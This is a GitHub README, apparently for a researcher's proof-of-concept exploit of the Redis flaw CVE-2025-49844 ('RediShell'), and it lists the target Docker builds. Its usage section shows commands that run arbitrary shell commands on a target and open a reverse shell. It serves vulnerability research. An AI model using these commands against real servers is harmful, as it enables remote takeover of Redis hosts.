CVE-2025-49844

My personal proof-of-concept for CVE-2025-49844, also known as RediShell.

Supported target builds:

x86-64 Linux redis:8.2.1-alpine Docker image
x86-64 Linux redis:8.2.1-bookworm Docker image

It's a bit clumsy, probably not as good as Wiz Research's. Still, I'm glad I managed to get it working before the Hexacon 2025 talks are uploaded, and I had a great time investigating it.

Usage

Run one-way shell commands:

$ uv run cve-2025-49844 command "echo 'hello world' > /data/hello.txt"

Connect to a reverse shell:

$ uv run cve-2025-49844 rshell -l 127.0.0.1 -p 4444

Name		Name	Last commit message	Last commit date
Latest commit History 36 Commits
dockerfiles		dockerfiles
src/cve_2025_49844		src/cve_2025_49844
.gitignore		.gitignore
.python-version		.python-version
LICENSE		LICENSE
README.md		README.md
demonstration.py		demonstration.py
pyproject.toml		pyproject.toml
uv.lock		uv.lock

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

CVE-2025-49844

Usage

About

Uh oh!

Releases

Packages

Uh oh!

Contributors 1

Languages

Folders and files

Latest commit

History

Repository files navigation

CVE-2025-49844

Usage

About

Topics

Resources

License

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors 1

Languages

Packages